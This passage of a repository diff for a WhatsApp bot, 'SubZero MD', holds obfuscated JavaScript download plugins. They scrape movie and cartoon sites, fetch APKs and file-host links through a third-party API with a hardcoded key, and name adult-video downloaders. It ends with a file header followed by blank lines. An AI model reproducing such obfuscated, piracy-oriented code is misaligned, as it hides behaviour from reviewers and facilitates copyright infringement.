0a╰━━━❐━⪼\x0a>\x20*©\x20Gᴇɴᴇʀᴀᴛᴇᴅ\x20ʙʏ\x20Sᴜʙᴢᴇʀᴏ*','imgUrl','views','div.inner-video-cell','slice','SUBZERO/FBDL.mp3','video/mp4','search','Please\x20reply\x20with\x20a\x20valid\x20number\x20from\x20the\x20list.','*Please\x20provide\x20a\x20search\x20query!\x20(e.g.,\x20Avatar)*','dl_links','\x0a\x0a•\x20*Size*\x20-\x20','div.video-title\x20>\x20a','name','developer','sinhalasub','*©\x20Pᴏᴡᴇʀᴇᴅ\x20Bʏ\x20SᴜʙZᴇʀᴏ*','*\x0a🔗\x20Link:\x20','416086TCIBHc','Download\x20apk.','title','application/vnd.android.package-archive','╭━━━〔\x20*SUBZERO-MD*\x20〕━━━┈⊷\x0a┃▸╭───────────\x0a┃▸┃๏\x20*TWITTER\x20DOWNLOADER*\x0a┃▸└───────────···๏\x0a╰────────────────┈⊷\x0a╭━❮\x20*Download\x20Video*\x20❯━┈⊷\x0a┃▸╭─────────────·๏\x0a┃▸┃๏\x20*1.1*\x20\x20\x20\x20\x20┃\x20\x20*SD\x20Quality*\x0a┃▸┃๏\x20*1.2*\x20\x20\x20\x20\x20┃\x20\x20*HD\x20Quality*\x0a┃▸└────────────┈⊷\x0a╰━━━━━━━━━━━━━━━⪼\x0a╭━❮\x20*Download\x20Audio*\x20❯━┈⊷\x0a┃▸╭─────────────·๏\x0a┃▸┃๏\x20*2.1*\x20\x20\x20\x20\x20┃\x20\x20*Audio*\x0a┃▸┃๏\x20*2.2*\x20\x20\x20\x20\x20┃\x20\x20*Document*\x0a┃▸┃๏\x20*2.3*\x20\x20\x20\x20\x20┃\x20\x20*Voice*\x0a┃▸└────────────┈⊷\x0a╰━━━━━━━━━━━━━━━⪼\x0a>\x20*©\x20Pᴏᴡᴇʀᴇᴅ\x20Bʏ\x20Sᴜʙᴢᴇʀᴏ-Aɪ\x20♡*','meta[property=\x22og:title\x22]','dlxv','\x20-\x20','Error\x20downloading\x20ZIP\x20file:','like','thumbnail','mimetype','audio/mp4','files','2942824scWfNi','*`Need\x20url`*','2.1','log','\x20\x0a┇๏\x20*File\x20Type*\x20-\x20','match','Failed\x20to\x20retrieve\x20Twitter\x20video.\x20Please\x20check\x20the\x20link\x20and\x20try\x20again.','66213asZFYS','nsfw','https://ginisisilacartoon.net/search.php?q=','audio/mpeg','An\x20error\x20occurred\x20while\x20trying\x20to\x20fetch\x20the\x20download\x20link.','contextInfo','each','*Invalid\x20selection.\x20Please\x20choose\x20a\x20valid\x20number.*','1.1',':*\x0a\x0a','https://www.dark-yasiya-api.site/download/mfire?url=','application/zip','messages.upsert','html5player.setThumbUrl169\x5c(\x27(.*?)\x27\x5c);','xvdl','mfire','Please\x20provide\x20a\x20valid\x20MediaFire\x20link.','cheerio','download','An\x20error\x20occurred\x20while\x20fetching\x20movie\x20details.\x20Please\x20try\x20again.','link','dlxnxx','.*\x20','\x0a\x0a•\x20*Like*\x20-\x20','meta[property=\x22og:video:height\x22]','\x0a\x0a☘\x20*We\x20are\x20uploading\x20the\x20Movie/Episode\x20you\x20requested.*','Error\x20during\x20search:','package','file','SUBZERO/TWDL.mp3','*Download\x20link\x20not\x20found\x20for\x20the\x20selected\x20episode.*','*©\x20Pᴏᴡᴇʀᴇᴅ\x20Bʏ\x20SᴜʙZᴇʀᴏ','duration','@mrnima/tiktok-downloader','stanzaId','unlinkSync','catch','sendMessage','Search\x20movies\x20on\x20sinhalasub\x20and\x20get\x20download\x20links','&apikey=mnp3grlZ','result','\x20\x0a╰━━━❐━⪼\x0a╭━❮\x20*Download\x20Video*\x20❯━┈⊷\x0a┃▸╭─────────────·๏\x0a┃▸┃๏\x20*1*\x20\x20\x20\x20\x20┃\x20\x20*SD\x20Quality*\x0a┃▸┃๏\x20*2*\x20\x20\x20\x20\x20┃\x20\x20*HD\x20Quality*\x0a┃▸└────────────┈⊷\x0a╰━━━━━━━━━━━━━━━⪼\x0a╭━❮\x20*Download\x20Audio*\x20❯━┈⊷\x0a┃▸╭─────────────·๏\x0a┃▸┃๏\x20*3*\x20\x20\x20\x20\x20┃\x20\x20*Audio*\x0a┃▸└────────────┈⊷\x0a╰━━━━━━━━━━━━━━━⪼\x0a>\x20*©\x20Pᴏᴡᴇʀᴇᴅ\x20Bʏ\x20Sᴜʙᴢᴇʀᴏ*','size','.mp4','meta[property=\x22og:image\x22]','.xv\x20<xvideos\x20link>','\x20\x0a┇๏\x20*Size*\x20-\x20','trim','Download\x20Twitter\x20videos','*`Need\x20URL`*','\x0aQuality:\x20','.elementor-post__thumbnail\x20img','load','ginisisila','https://www.dark-yasiya-api.site/download/xvideo?url=','*Please\x20give\x20me\x20url\x20!!*'];_0x573c=function(){return _0x490f4a;};return _0x573c();}const fs=require('fs'),path=require('path');cmd({'pattern':'baiscope','alias':[_0x59c8a1(0x172)],'react':'📑','category':_0x59c8a1(0x12b),'desc':_0x59c8a1(0x1a4),'filename':__filename},async(_0x119094,_0x2fdf55,_0x5a8e90,{from:_0x518a61,q:_0x58de3c,isDev:_0x278fb1,reply:_0x1b72fd})=>{const _0xe9f21c=_0x59c8a1;try{if(!_0x58de3c)return await _0x1b72fd(_0xe9f21c(0xfb));const _0x2a841e=_0xe9f21c(0x18f)+encodeURIComponent(_0x58de3c),_0x30e6e3=await axios[_0xe9f21c(0x1c8)](_0x2a841e),_0x425c50=cheerio['load'](_0x30e6e3[_0xe9f21c(0x1b9)]);let _0x27fe64=[];_0x425c50('article.elementor-post')['each']((_0x12f2f9,_0x45303b)=>{const _0x5eb6f9=_0xe9f21c,_0x286ba8=_0x425c50(_0x45303b)[_0x5eb6f9(0x19c)](_0x5eb6f9(0x19a))[_0x5eb6f9(0x1d0)]()[_0x5eb6f9(0x148)](),_0x292c7e=_0x425c50(_0x45303b)[_0x5eb6f9(0x19c)](_0x5eb6f9(0x19a))[_0x5eb6f9(0x1cb)](_0x5eb6f9(0x19f)),_0x25e27c=_0x425c50(_0x45303b)['find'](_0x5eb6f9(0x14c))[_0x5eb6f9(0x1cb)](_0x5eb6f9(0x1b8));_0x286ba8&&_0x292c7e&&_0x25e27c&&_0x27fe64[_0x5eb6f9(0x1c4)]({'title':_0x286ba8,'episodeLink':_0x292c7e,'imgUrl':_0x25e27c});});if(_0x27fe64[_0xe9f21c(0x1ca)]===0x0)return await _0x1b72fd(_0xe9f21c(0x185)+_0x58de3c);let _0x13fcf2='📺\x20Search\x20Results\x20for\x20*'+_0x58de3c+':*\x0a\x0a';_0x27fe64[_0xe9f21c(0x1c0)]((_0x1e4d2b,_0x27a529)=>{const _0x539451=_0xe9f21c;_0x13fcf2+='*'+(_0x27a529+0x1)+'.*\x20'+_0x1e4d2b[_0x539451(0x106)]+_0x539451(0x169)+_0x1e4d2b[_0x539451(0x1b2)]+'\x0a\x0a';});const _0x1e43cd=await _0x119094[_0xe9f21c(0x13e)](_0x518a61,{'text':_0x13fcf2},{'quoted':_0x5a8e90}),_0x1ba2cb=_0x1e43cd['key']['id'];_0x119094['ev']['on']('messages.upsert',async _0xb4c040=>{const _0x35b758=_0xe9f21c,_0x4a5697=_0xb4c040[_0x35b758(0x1c1)][0x0];if(!_0x4a5697[_0x35b758(0x1c3)])return;const _0x42f493=_0x4a5697[_0x35b758(0x1c3)][_0x35b758(0x1b5)]||_0x4a5697['message']['extendedTextMessage']?.[_0x35b758(0x1d0)],_0x135d64=_0x4a5697['key']['remoteJid'],_0xba153d=_0x4a5697['message'][_0x35b758(0x1ce)]&&_0x4a5697[_0x35b758(0x1c3)][_0x35b758(0x1ce)][_0x35b758(0x11e)][_0x35b758(0x13b)]===_0x1ba2cb;if(_0xba153d){const _0x2338cf=parseInt(_0x42f493[_0x35b758(0x148)]());if(!isNaN(_0x2338cf)&&_0x2338cf>0x0&&_0x2338cf<=_0x27fe64[_0x35b758(0x1ca)]){const _0x4caca7=_0x27fe64[_0x2338cf-0x1],_0x4c6ae7=await axios[_0x35b758(0x1c8)](_0x4caca7['episodeLink']),_0x90849d=cheerio[_0x35b758(0x14d)](_0x4c6ae7[_0x35b758(0x1b9)]),_0x1a4ea8=_0x90849d('a.dlm-buttons-button')['attr']('href');if(_0x1a4ea8){await _0x119094['sendMessage'](_0x135d64,{'image':{'url':_0x4caca7[_0x35b758(0x1d9)]},'caption':_0x35b758(0x160)+_0x4caca7[_0x35b758(0x106)]+_0x35b758(0x103)+_0x4caca7[_0x35b758(0x1b2)]+_0x35b758(0x1d7)},{'quoted':_0x4a5697});const _0x28536a=path[_0x35b758(0x1a9)](__dirname,_0x35b758(0x180)),_0x1a08bc=fs[_0x35b758(0x1c2)](_0x28536a),_0x36d547=await axios({'url':_0x1a4ea8,'method':'GET','responseType':_0x35b758(0x1a1)});_0x36d547[_0x35b758(0x1b9)][_0x35b758(0x1ab)](_0x1a08bc),_0x1a08bc['on'](_0x35b758(0x1bb),async()=>{const _0x4822ee=_0x35b758;await _0x119094['sendMessage'](_0x135d64,{'document':{'url':_0x28536a},'mimetype':_0x4822ee(0x124),'fileName':_0x4caca7['title']+_0x4822ee(0x15d),'caption':'*'+_0x4caca7[_0x4822ee(0x106)]+_0x4822ee(0x17f)},{'quoted':_0x4a5697}),fs[_0x4822ee(0x13c)](_0x28536a);}),_0x1a08bc['on']('error',_0x4cfcbf=>{const _0x3d9491=_0x35b758;console['error'](_0x3d9491(0x10c),_0x4cfcbf),_0x1b72fd('*Error\x20downloading\x20the\x20episode\x20ZIP\x20file.*');});}else await _0x1b72fd(_0x35b758(0x137));}else await _0x1b72fd(_0x35b758(0x120));}});}catch(_0x3c1cad){console[_0xe9f21c(0x192)](_0x3c1cad),await _0x1b72fd(_0xe9f21c(0x1be));}}),cmd({'pattern':_0x59c8a1(0x14e),'react':'📑','category':'download','desc':'ginisisilacartoon.net','filename':__filename},async(_0x18e799,_0x5b0e42,_0x199241,{from:_0x3a07e7,q:_0xb03acc,isDev:_0x451fe5,reply:_0x2eaf08})=>{const _0x1bdbeb=_0x59c8a1;try{if(!_0xb03acc)return await _0x2eaf08(_0x1bdbeb(0x16a));const _0x1af8bb=_0x1bdbeb(0x11b)+encodeURIComponent(_0xb03acc),_0x2dbe37=await axios[_0x1bdbeb(0x1c8)](_0x1af8bb),_0x3baeea=cheerio[_0x1bdbeb(0x14d)](_0x2dbe37[_0x1bdbeb(0x1b9)]);let _0x42527a=[];_0x3baeea(_0x1bdbeb(0x1db))[_0x1bdbeb(0x11f)]((_0x5aa3d5,_0x45f029)=>{const _0x316be8=_0x1bdbeb,_0x4d8661=_0x3baeea(_0x45f029)['find'](_0x316be8(0xfe))[_0x316be8(0x1cb)](_0x316be8(0x106)),_0x30ffda=_0x3baeea(_0x45f029)['find'](_0x316be8(0x1cd))['text']()['trim'](),_0x5b5308=_0x3baeea(_0x45f029)[_0x316be8(0x19c)](_0x316be8(0xfe))[_0x316be8(0x1cb)](_0x316be8(0x19f)),_0x5ef472=_0x3baeea(_0x45f029)[_0x316be8(0x19c)](_0x316be8(0x18a))['attr'](_0x316be8(0x1b8));_0x4d8661&&_0x5b5308&&_0x42527a[_0x316be8(0x1c4)]({'title':_0x4d8661,'postedTime':_0x30ffda,'episodeLink':'https://ginisisilacartoon.net/'+_0x5b5308,'imageUrl':_0x5ef472});});if(_0x42527a[_0x1bdbeb(0x1ca)]===0x0)return await _0x2eaf08(_0x1bdbeb(0x185)+_0xb03acc);let _0x460b8b=_0x1bdbeb(0x191)+_0xb03acc+_0x1bdbeb(0x122);_0x42527a[_0x1bdbeb(0x1c0)]((_0x10431c,_0x2425d9)=>{const _0x539f50=_0x1bdbeb;_0x460b8b+='*'+(_0x2425d9+0x1)+'.*\x20'+_0x10431c[_0x539f50(0x106)]+'\x0a🗓️\x20Posted:\x20'+_0x10431c[_0x539f50(0x188)]+_0x539f50(0x169)+_0x10431c['episodeLink']+'\x0a\x0a';});const _0x56ec96=await _0x18e799['sendMessage'](_0x3a07e7,{'text':_0x460b8b},{'quoted':_0x199241}),_0x1fc6bd=_0x56ec96[_0x1bdbeb(0x195)]['id'];_0x18e799['ev']['on'](_0x1bdbeb(0x125),async _0x5dd909=>{const _0x4315b8=_0x1bdbeb,_0x4fd426=_0x5dd909['messages'][0x0];if(!_0x4fd426[_0x4315b8(0x1c3)])return;const _0x1c4419=_0x4fd426[_0x4315b8(0x1c3)][_0x4315b8(0x1b5)]||_0x4fd426['message'][_0x4315b8(0x1ce)]?.[_0x4315b8(0x1d0)],_0x568126=_0x4fd426[_0x4315b8(0x195)][_0x4315b8(0x1bf)],_0x24db8a=_0x4fd426[_0x4315b8(0x1c3)][_0x4315b8(0x1ce)]&&_0x4fd426['message'][_0x4315b8(0x1ce)][_0x4315b8(0x11e)][_0x4315b8(0x13b)]===_0x1fc6bd;if(_0x24db8a){const _0x36f9f9=parseInt(_0x1c4419[_0x4315b8(0x148)]());if(!isNaN(_0x36f9f9)&&_0x36f9f9>0x0&&_0x36f9f9<=_0x42527a[_0x4315b8(0x1ca)]){const _0x4e5378=_0x42527a[_0x36f9f9-0x1],_0xded761=_0x4315b8(0x19e)+_0x4e5378['title']+_0x4315b8(0x15f)+_0x4e5378[_0x4315b8(0x188)]+'\x0a📎\x20*ᴇᴘɪꜱᴏᴅᴇ\x20ʟɪɴᴋ*:-\x20'+_0x4e5378['episodeLink']+_0x4315b8(0x132),_0x187ea8={'image':{'url':_0x4e5378[_0x4315b8(0x194)]},'caption':_0xded761};await _0x18e799['sendMessage'](_0x568126,_0x187ea8,{'quoted':_0x4fd426});const _0x462cc7=await axios['get'](_0x4e5378[_0x4315b8(0x1b2)]),_0x48f6ca=cheerio[_0x4315b8(0x14d)](_0x462cc7[_0x4315b8(0x1b9)]),_0x310964=_0x48f6ca(_0x4315b8(0x166))['attr'](_0x4315b8(0x1b8));if(_0x310964){const _0xc4a381=_0x4315b8(0x1c6)+_0x310964+'&apikey=mnp3grlZ';try{const _0x18c43c=await axios['get'](_0xc4a381),_0x532c9f=_0x18c43c[_0x4315b8(0x1b9)]['result'][_0x4315b8(0x176)];_0x532c9f?await _0x18e799[_0x4315b8(0x13e)](_0x568126,{'document':{'url':_0x532c9f},'mimetype':'video/mp4','fileName':'MR\x20FRANK\x20|\x20'+_0x4e5378[_0x4315b8(0x106)]+'.mp4','caption':_0x4e5378[_0x4315b8(0x106)]+_0x4315b8(0x158)},{'quoted':_0x4fd426}):await _0x2eaf08(_0x4315b8(0x177));}catch(_0x5596c7){console[_0x4315b8(0x192)](_0x4315b8(0x15c),_0x5596c7),await _0x2eaf08(_0x4315b8(0x11d));}}else await _0x2eaf08(_0x4315b8(0x168));}else await _0x2eaf08(_0x4315b8(0xfa));}});}catch(_0x3f053b){_0x2eaf08(_0x1bdbeb(0x175)),console[_0x1bdbeb(0x192)](_0x3f053b);}}),cmd({'pattern':'apk','desc':_0x59c8a1(0x105),'category':_0x59c8a1(0x12b),'filename':__filename},async(_0x431328,_0x2aebd9,_0x29da74,{from:_0x17ed1b,quoted:_0x3b3c93,body:_0x599b2c,isCmd:_0x56c6bc,command:_0x674fa2,args:_0x4b82e0,q:_0xeddfaa,isGroup:_0x26e635,sender:_0x5da46f,senderNumber:_0x5a30a2,botNumber2:_0x5bb9b3,botNumber:_0x5e7e12,pushname:_0x361a76,isMe:_0x280328,isOwner:_0x4e654c,groupMetadata:_0x18bce1,groupName:_0x161184,participants:_0x266f3f,groupAdmins:_0x4ed238,isBotAdmins:_0x57bfe5,isAdmins:_0x17195b,reply:_0x46869b})=>{const _0x4f3ac3=_0x59c8a1;try{await _0x29da74[_0x4f3ac3(0x1c7)]('⬇');const _0x20944e=_0x4f3ac3(0x18c)+_0xeddfaa+'/limit=1',_0x58fd62=await axios[_0x4f3ac3(0x1c8)](_0x20944e),_0x562333=_0x58fd62[_0x4f3ac3(0x1b9)];let _0x3527e5=_0x562333[_0x4f3ac3(0x1c5)]['list'][0x0][_0x4f3ac3(0x143)]%0xf4240,_0x37fe2e='.'+_0x3527e5,_0x2ad20a=_0x562333[_0x4f3ac3(0x1c5)][_0x4f3ac3(0x1af)][0x0]['size']/0xf4240,_0x110876=_0x2ad20a-_0x37fe2e,_0x376294=_0x4f3ac3(0x1b6)+_0x562333[_0x4f3ac3(0x1c5)]['list'][0x0][_0x4f3ac3(0xff)]+_0x4f3ac3(0x147)+_0x110876+_0x4f3ac3(0x1ba)+_0x562333[_0x4f3ac3(0x1c5)][_0x4f3ac3(0x1af)][0x0][_0x4f3ac3(0x134)]+'\x20\x0a┇๏\x20*Updated\x20On*\x20-\x20'+_0x562333[_0x4f3ac3(0x1c5)][_0x4f3ac3(0x1af)][0x0][_0x4f3ac3(0x1a2)]+_0x4f3ac3(0x199)+_0x562333[_0x4f3ac3(0x1c5)][_0x4f3ac3(0x1af)][0x0][_0x4f3ac3(0x100)][_0x4f3ac3(0xff)]+_0x4f3ac3(0x1d8);await _0x29da74['react']('⬆'),await _0x431328['sendMessage'](_0x17ed1b,{'document':{'url':_0x562333['datalist'][_0x4f3ac3(0x1af)][0x0][_0x4f3ac3(0x135)][_0x4f3ac3(0x190)]},'fileName':_0x562333[_0x4f3ac3(0x1c5)][_0x4f3ac3(0x1af)][0x0][_0x4f3ac3(0xff)],'mimetype':_0x4f3ac3(0x107),'caption':_0x376294},{'quoted':_0x2aebd9}),await _0x29da74[_0x4f3ac3(0x1c7)]('✅');}catch(_0x2018c6){console[_0x4f3ac3(0x115)](_0x2018c6),_0x46869b(''+_0x2018c6);}});function _0x3cc3(_0x3068fb,_0x2ece26){const _0x573c8c=_0x573c();return _0x3cc3=function(_0x3cc3c1,_0x2bd479){_0x3cc3c1=_0x3cc3c1-0xf8;let _0x1c9dea=_0x573c8c[_0x3cc3c1];return _0x1c9dea;},_0x3cc3(_0x3068fb,_0x2ece26);}const {sinhalaSub}=require(_0x59c8a1(0x1ac));cmd({'pattern':_0x59c8a1(0x101),'alias':['movie'],'react':'📑','category':_0x59c8a1(0x12b),'desc':_0x59c8a1(0x13f),'filename':__filename},async(_0x2bc69a,_0x38095e,_0x39354f,{from:_0x2958ae,q:_0x3ff8b3,reply:_0x26d7d6})=>{const _0x2a5dd0=_0x59c8a1;try{if(!_0x3ff8b3)return await _0x26d7d6('*Please\x20provide\x20a\x20search\x20query!\x20(e.g.,\x20Deadpool)*');var _0x12e4b7=await sinhalaSub();const _0x4698e5=await _0x12e4b7[_0x2a5dd0(0xf9)](_0x3ff8b3),_0x8d5c1=_0x4698e5['result'][_0x2a5dd0(0x1dc)](0x0,0xa);if(!_0x8d5c1||_0x8d5c1[_0x2a5dd0(0x1ca)]===0x0)return await _0x26d7d6(_0x2a5dd0(0x185)+_0x3ff8b3);let _0x3c237b='📽️\x20*Search\x20Results\x20for*\x20\x22'+_0x3ff8b3+_0x2a5dd0(0x1c9);_0x8d5c1[_0x2a5dd0(0x1c0)]((_0x3911aa,_0x3da105)=>{const _0x30b3e2=_0x2a5dd0;_0x3c237b+='*'+(_0x3da105+0x1)+_0x30b3e2(0x12f)+_0x3911aa['title']+_0x30b3e2(0x169)+_0x3911aa[_0x30b3e2(0x12d)]+'\x0a\x0a';});const _0x2e742f=await _0x2bc69a['sendMessage'](_0x2958ae,{'text':_0x3c237b},{'quoted':_0x39354f}),_0x7e6837=_0x2e742f[_0x2a5dd0(0x195)]['id'];_0x2bc69a['ev']['on'](_0x2a5dd0(0x125),async _0x275eb7=>{const _0x37c0c9=_0x2a5dd0,_0x377e4f=_0x275eb7[_0x37c0c9(0x1c1)][0x0];if(!_0x377e4f['message'])return;const _0x55a6bf=_0x377e4f['message'][_0x37c0c9(0x1b5)]||_0x377e4f['message']['extendedTextMessage']?.['text'],_0x36d641=_0x377e4f[_0x37c0c9(0x1c3)][_0x37c0c9(0x1ce)]&&_0x377e4f[_0x37c0c9(0x1c3)][_0x37c0c9(0x1ce)]['contextInfo'][_0x37c0c9(0x13b)]===_0x7e6837;if(_0x36d641){const _0x5cdff7=parseInt(_0x55a6bf[_0x37c0c9(0x148)]());if(!isNaN(_0x5cdff7)&&_0x5cdff7>0x0&&_0x5cdff7<=_0x8d5c1[_0x37c0c9(0x1ca)]){const _0x52d441=_0x8d5c1[_0x5cdff7-0x1],_0x128dad='https://api-site-2.vercel.app/api/sinhalasub/movie?url='+encodeURIComponent(_0x52d441['link']);try{const _0x34711e=await axios[_0x37c0c9(0x1c8)](_0x128dad),_0x2a3f0b=_0x34711e['data'][_0x37c0c9(0x141)],_0x445770=_0x2a3f0b[_0x37c0c9(0xfc)]||[];if(_0x445770[_0x37c0c9(0x1ca)]===0x0)return await _0x26d7d6(_0x37c0c9(0x1ae));let _0x12b4eb=_0x37c0c9(0x17d)+_0x2a3f0b[_0x37c0c9(0x106)]+'*\x0a\x0a';_0x12b4eb+=_0x37c0c9(0x159),_0x445770[_0x37c0c9(0x1c0)]((_0x225381,_0x3ab260)=>{const _0x430254=_0x37c0c9;_0x12b4eb+='*'+(_0x3ab260+0x1)+_0x430254(0x12f)+_0x225381[_0x430254(0x154)]+'\x20-\x20'+_0x225381['size']+_0x430254(0x169)+_0x225381[_0x430254(0x12d)]+'\x0a\x0a';});const _0x3fa690=await _0x2bc69a[_0x37c0c9(0x13e)](_0x2958ae,{'text':_0x12b4eb},{'quoted':_0x377e4f}),_0x1bed6e=_0x3fa690['key']['id'];_0x2bc69a['ev']['on'](_0x37c0c9(0x125),async _0x361530=>{const _0x354c97=_0x37c0c9,_0x328f48=_0x361530[_0x354c97(0x1c1)][0x0];if(!_0x328f48[_0x354c97(0x1c3)])return;const _0x425161=_0x328f48[_0x354c97(0x1c3)][_0x354c97(0x1b5)]||_0x328f48['message'][_0x354c97(0x1ce)]?.[_0x354c97(0x1d0)],_0x157370=_0x328f48[_0x354c97(0x1c3)][_0x354c97(0x1ce)]&&_0x328f48[_0x354c97(0x1c3)][_0x354c97(0x1ce)][_0x354c97(0x11e)]['stanzaId']===_0x1bed6e;if(_0x157370){const _0x591037=parseInt(_0x425161[_0x354c97(0x148)]());if(!isNaN(_0x591037)&&_0x591037>0x0&&_0x591037<=_0x445770[_0x354c97(0x1ca)]){const _0x386b23=_0x445770[_0x591037-0x1],_0x54184a=_0x386b23[_0x354c97(0x12d)]['split']('/')[_0x354c97(0x174)]();await _0x2bc69a['sendMessage'](_0x2958ae,{'react':{'text':'⬇️','key':_0x39354f[_0x354c97(0x195)]}});const _0x2807b1=_0x354c97(0x179)+_0x54184a;await _0x2bc69a[_0x354c97(0x13e)](_0x2958ae,{'react':{'text':'⬆','key':_0x39354f['key']}}),await _0x2bc69a['sendMessage'](_0x2958ae,{'document':{'url':_0x2807b1},'mimetype':_0x354c97(0xf8),'fileName':_0x2a3f0b[_0x354c97(0x106)]+_0x354c97(0x10b)+_0x386b23[_0x354c97(0x154)]+_0x354c97(0x144),'caption':_0x2a3f0b[_0x354c97(0x106)]+_0x354c97(0x14b)+_0x386b23[_0x354c97(0x154)]+'\x0aPowered\x20by\x20SinhalaSub','contextInfo':{'mentionedJid':[],'externalAdReply':{'title':_0x2a3f0b[_0x354c97(0x106)],'body':_0x354c97(0x1bd),'mediaType':0x1,'sourceUrl':_0x52d441[_0x354c97(0x12d)],'thumbnailUrl':_0x2a3f0b[_0x354c97(0x19b)]}}},{'quoted':_0x328f48}),await _0x2bc69a[_0x354c97(0x13e)](_0x2958ae,{'react':{'text':'✅','key':_0x39354f[_0x354c97(0x195)]}});}else await _0x26d7d6(_0x354c97(0x173));}});}catch(_0x292fe9){console['error']('Error\x20fetching\x20movie\x20details:',_0x292fe9),await _0x26d7d6(_0x37c0c9(0x12c));}}else await _0x26d7d6('Invalid\x20selection.\x20Please\x20reply\x20with\x20a\x20valid\x20number.');}});}catch(_0x574d62){console['error'](_0x2a5dd0(0x133),_0x574d62),_0x26d7d6(_0x2a5dd0(0x17e));}}),cmd({'pattern':_0x59c8a1(0x15a),'desc':'To\x20download\x20Gdrive\x20files.','react':'🌐','category':_0x59c8a1(0x12b),'filename':__filename},async(_0xf5ca65,_0x53ce51,_0x370aa1,{from:_0x501ba1,quoted:_0x2ca093,body:_0x3b6eeb,isCmd:_0x44dd81,command:_0x20522f,args:_0x57f194,q:_0x69e7d4,isGroup:_0x3e4f07,sender:_0x5b1cac,senderNumber:_0x2c1228,botNumber2:_0x480195,botNumber:_0x28f79b,pushname:_0x18c8fd,isMe:_0x29be84,isOwner:_0x3b1ee8,groupMetadata:_0x42a2bf,groupName:_0x267f9c,participants:_0x3ebac4,groupAdmins:_0x1568d9,isBotAdmins:_0x33b3a4,isAdmins:_0x214893,reply:_0x4beeec})=>{const _0x43468b=_0x59c8a1;try{await _0xf5ca65['sendMessage'](_0x501ba1,{'react':{'text':'⬇️','key':_0x53ce51['key']}});if(!_0x69e7d4)return _0x370aa1[_0x43468b(0x1a5)](_0x43468b(0x1d1));const _0x207ec9=_0x43468b(0x1c6)+_0x69e7d4+_0x43468b(0x140),_0x2c3cdc=await axios[_0x43468b(0x1c8)](_0x207ec9),_0x24cd9f=_0x2c3cdc[_0x43468b(0x1b9)][_0x43468b(0x141)]['downloadUrl'];_0x24cd9f&&(await _0xf5ca65[_0x43468b(0x13e)](_0x501ba1,{'react':{'text':'⬆️','key':_0x53ce51[_0x43468b(0x195)]}}),await _0xf5ca65[_0x43468b(0x13e)](_0x501ba1,{'document':{'url':_0x24cd9f},'mimetype':_0x2c3cdc[_0x43468b(0x1b9)]['result'][_0x43468b(0x10f)],'fileName':_0x2c3cdc['data']['result'][_0x43468b(0x1b1)],'caption':_0x43468b(0x138)},{'quoted':_0x53ce51})),await _0xf5ca65[_0x43468b(0x13e)](_0x501ba1,{'react':{'text':'✅','key':_0x53ce51[_0x43468b(0x195)]}});}catch(_0xa7c467){console['log'](_0xa7c467);}});
|
plugins/main-group.js
ADDED
@@ -0,0 +1,220 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
1 |
+
/*
|
2 |
+
|
3 |
+
$$$$$$\ $$\
|
4 |
+
$$ __$$\ $$ |
|
5 |
+
$$ / \__|$$\ $$\ $$$$$$$\ $$$$$$$$\ $$$$$$\ $$$$$$\ $$$$$$\
|
6 |
+
\$$$$$$\ $$ | $$ |$$ __$$\ \____$$ |$$ __$$\ $$ __$$\ $$ __$$\
|
7 |
+
\____$$\ $$ | $$ |$$ | $$ | $$$$ _/ $$$$$$$$ |$$ | \__|$$ / $$ |
|
8 |
+
$$\ $$ |$$ | $$ |$$ | $$ | $$ _/ $$ ____|$$ | $$ | $$ |
|
9 |
+
\$$$$$$ |\$$$$$$ |$$$$$$$ |$$$$$$$$\ \$$$$$$$\ $$ | \$$$$$$ |
|
10 |
+
\______/ \______/ \_______/ \________| \_______|\__| \______/
|
11 |
+
|
12 |
+
Project Name : SubZero MD
|
13 |
+
Creator : Darrell Mucheri ( Mr Frank OFC )
|
14 |
+
Repo : https//github.com/mrfrank-ofc/SUBZERO-MD
|
15 |
+
Support : wa.me/18062212660
|
16 |
+
*/
|
17 |
+
|
18 |
+
|
19 |
+
|
20 |
+
|
21 |
+
|
22 |
+
|
23 |
+
|
24 |
+
|
25 |
+
|
26 |
+
|
27 |
+
|
28 |
+
|
29 |
+
|
30 |
+
|
31 |
+
|
32 |
+
|
33 |
+
|
34 |
+
|
35 |
+
|
36 |
+
|
37 |
+
|
38 |
+
|
39 |
+
|
40 |
+
|
41 |
+
|
42 |
+
|
43 |
+
|
44 |
+
|
45 |
+
|
46 |
+
|
47 |
+
|
48 |
+
|
49 |
+
|
50 |
+
|
51 |
+
|
52 |
+
|
53 |
+
|
54 |
+
|
55 |
+
|
56 |
+
|
57 |
+
|
58 |
+
|
59 |
+
|
60 |
+
|
61 |
+
|
62 |
+
|
63 |
+
|
64 |
+
|
65 |
+
|
66 |
+
|
67 |
+
|
68 |
+
|
69 |
+
|
70 |
+
|
71 |
+
|
72 |
+
|
73 |
+
|
74 |
+
|
75 |
+
|
76 |
+
|
77 |
+
|
78 |
+
|
79 |
+
|
80 |
+
|
81 |
+
|
82 |
+
